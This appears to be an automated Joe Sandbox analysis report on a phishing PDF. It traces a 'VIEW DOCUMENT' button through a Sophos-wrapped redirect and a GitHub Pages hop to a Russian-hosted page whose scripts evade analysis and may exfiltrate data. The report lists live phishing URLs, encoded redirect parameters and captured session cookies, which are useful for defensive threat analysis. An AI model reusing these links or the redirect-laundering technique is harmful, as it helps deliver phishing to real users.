Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dec 2024_12192924_Image.pdf

Overview

General Information

Sample name:Dec 2024_12192924_Image.pdf
Analysis ID:1578696
MD5:bf07c6a40a0a53065c8f2fc1f9ca1739
SHA1:0b7dde9056ef9f1857ba7500a96758a57203207e
SHA256:292d3483cc54f481e70c8843ac30cc458f547f475586b274a9fe71b1a902df9e
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
IP address seen in connection with other malware
Internet Provider seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7416 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Dec 2024_12192924_Image.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7584 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7772 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1712,i,7851807782142583231,13662592342447988891,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 4916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1932,i,8969801089404942635,6828313683208421111,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_195JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_195, type: DROPPED
    Source: PDF documentJoe Sandbox AI: Page contains button: 'VIEW DOCUMENT' Source: 'PDF document'
    Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'view document'
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8g.tolirax.ru/3JCtG/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser developer tools, and redirecting the user to an external website. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's system.
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8g.tolirax.ru/3JCtG/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While the script appears to have some legitimate functionality, such as loading jQuery and setting up a CAPTCHA-like interface, the presence of obfuscated code and interactions with untrusted domains raises significant security concerns. Further investigation is warranted to determine the true intent and potential impact of this script.
    Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8g.tolirax.ru/3JCtG/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: https://8g.tolirax.ru/3JCtG/HTTP Parser: No favicon
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: us-east-2.protection.sophos.com to https://purogosouls.github.io/64ds6f4s9d4f89sd4sf46sd4f6/
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
    Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
    Source: Joe Sandbox ViewIP Address: 185.199.108.153 185.199.108.153
    Source: Joe Sandbox ViewIP Address: 185.199.108.153 185.199.108.153
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA HTTP/1.1Host: us-east-2.protection.sophos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /64ds6f4s9d4f89sd4sf46sd4f6/ HTTP/1.1Host: purogosouls.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: purogosouls.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://purogosouls.github.io/64ds6f4s9d4f89sd4sf46sd4f6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /3JCtG/ HTTP/1.1Host: 8g.tolirax.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://purogosouls.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8g.tolirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 8g.tolirax.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://8g.tolirax.ru/3JCtG/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik1DWnF3eVo0RmtGRjNmTGJVR0VPUHc9PSIsInZhbHVlIjoiKzIxaVB0RFZ3TGtCVU82cGJIcldHZnhnY1FxbkNTMzF0VnZSQmF6eEo4c1Iyb0VicTVGM0xwemNlRTFNWGt1NTFrMkJMc2VOanFyZE5kenVQbHNVR1BkNkdLUEZzc3YrN2NSVVRzazI2K1NFTTIxUXBiTWdKZ0ZjekNta21mc1QiLCJtYWMiOiJkZGY4MDk2N2NjYjFmMTViMDU0MjRjY2UwZTc2MDRjZTNjMzk5ZTZjY2U2ZWRjZWYyY2EzZTZjMzEwMjI5NWVkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFIMjczRWtJK0xxNFBrV1ZMR2M1bmc9PSIsInZhbHVlIjoiR21KUFBjbWpldjlqbHRiYzRMNXFQeDFJWVZoUmRveGZlaXJjM1NjcytNdGwwbTVqYTdkR1FHNkdFdkpzOExWQTQ3Y3JqQXkyZFFOMmlQRmdzK3RZSEFNZFNRVVdlcjlhU1M3N2JWRU9yUEdZRUhkcXFZMnJtWnZQOS9rWWNOeGkiLCJtYWMiOiIzZDU5NTRhYTU3ODQzNjY3ZDIxZjNjZWZlM2VkNDY5NjdjYWQ2ZjYzZDBkYjI4NWMxYjMxYjg5NGUzZDc3NzZmIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: global trafficDNS traffic detected: DNS query: us-east-2.protection.sophos.com
    Source: global trafficDNS traffic detected: DNS query: purogosouls.github.io
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: 8g.tolirax.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownHTTP traffic detected: POST /report/v4?s=eeeNXmnhpt9%2FvngBOAkuJYcanjlCHZiR7D7HQEo%2Fq1vBnhfxkrdQdOr0EHJZ3QerJuBLDL28YuJ9CDo%2BiFWJKD2jGH2qnTLSyudlVXmdC4MiRFRlOcIqtHBv4h23Ug%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 421Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 9115Server: GitHub.comContent-Type: text/html; charset=utf-8permissions-policy: interest-cohort=()ETag: "6758a043-239b"Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'X-GitHub-Request-Id: 7A8B:1C3531:2C243E:2F8AD9:6764FE54Accept-Ranges: bytesAge: 0Date: Fri, 20 Dec 2024 05:19:18 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740066-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1734671959.570461,VS0,VE11Vary: Accept-EncodingX-Fastly-Request-ID: b0f46557af894445b73974fbae367581343e320d
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 05:19:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eeeNXmnhpt9%2FvngBOAkuJYcanjlCHZiR7D7HQEo%2Fq1vBnhfxkrdQdOr0EHJZ3QerJuBLDL28YuJ9CDo%2BiFWJKD2jGH2qnTLSyudlVXmdC4MiRFRlOcIqtHBv4h23Ug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3837&min_rtt=1684&rtt_var=3374&sent=33&recv=22&lost=0&retrans=0&sent_bytes=30818&recv_bytes=2985&delivery_rate=4634319&cwnd=257&unsent_bytes=0&cid=4b1fe8265a6c8697&ts=624&x=0"CF-Cache-Status: HITAge: 3119Server: cloudflareCF-RAY: 8f4d2d72ec103344-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2004&rtt_var=772&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1889&delivery_rate=1457085&cwnd=209&unsent_bytes=0&cid=7c3a316c2d5edb74&ts=4356&x=0"
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
    Source: chromecache_198.10.drString found in binary or memory: https://8g.tolirax.ru/3JCtG/
    Source: chromecache_199.10.drString found in binary or memory: https://githubstatus.com
    Source: chromecache_199.10.drString found in binary or memory: https://help.github.com/pages/
    Source: chromecache_199.10.drString found in binary or memory: https://twitter.com/githubstatus
    Source: Dec 2024_12192924_Image.pdfString found in binary or memory: https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRod
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: classification engineClassification label: mal56.phis.winPDF@40/63@15/9
    Source: Dec 2024_12192924_Image.pdfInitial sample: https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=ahr0chm6ly9wdxjvz29zb3vscy5naxrodwiuaw8vnjrkczzmnhm5zdrmodlzzdrzzjq2c2q0zjyv&i=nwq0m2e1n2m3m2u5mzqxmgm1njbhnmq1&t=detln04wqwzmz0hqzlpizeywvxz4nhfvc2nqngtsuwl4unlndk5helzoaz0=&h=356f16f6a39049efa5b305c7477e094a&s=avnpuehut0nftknswvbusvzahp6ednex344kfpbgkngwpxefgjhtcvdiv0grc1_jza
    Source: Dec 2024_12192924_Image.pdfInitial sample: https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-20 00-18-46-896.logJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Dec 2024_12192924_Image.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1712,i,7851807782142583231,13662592342447988891,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1932,i,8969801089404942635,6828313683208421111,262144 /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1712,i,7851807782142583231,13662592342447988891,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1932,i,8969801089404942635,6828313683208421111,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Dec 2024_12192924_Image.pdfInitial sample: PDF keyword /JS count = 0
    Source: Dec 2024_12192924_Image.pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: A95quhno_2iqh7w_5sk.tmp.0.drInitial sample: PDF keyword /JS count = 0
    Source: A95quhno_2iqh7w_5sk.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
    Source: Dec 2024_12192924_Image.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
